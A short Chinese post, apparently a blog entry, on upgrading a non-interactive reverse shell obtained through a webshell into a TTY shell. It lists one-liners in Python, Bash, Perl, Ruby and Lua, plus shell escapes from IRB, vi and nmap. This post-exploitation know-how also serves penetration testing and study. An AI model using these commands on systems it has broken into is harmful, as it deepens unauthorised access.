通常在webshell中反弹一个shell到主机或VPS中,产生的shell并不是tty(交互式)shell 此时我们无法通过输入su命令来切换用户,故有此文
Python
python -c 'import pty; pty.spawn("/bin/sh")'
下面的方式未验证成功,Python中没有echo,如果去掉echo保存到py文件中可以成功
echo os.system('/bin/bash')
Bash
/bin/sh -i
Perl
直接执行
perl -e 'exec "/bin/sh";'
perl脚本执行
exec"/bin/sh";
Ruby
exec "/bin/sh"
Lua
os.execute('/bin/sh')
From within IRB
exec "/bin/sh"
From within vi
:!bash
另一种vi下的方式没有验证
:set shell=/bin/bash:shell
From within nmap
!sh
欢迎在下方评论交流。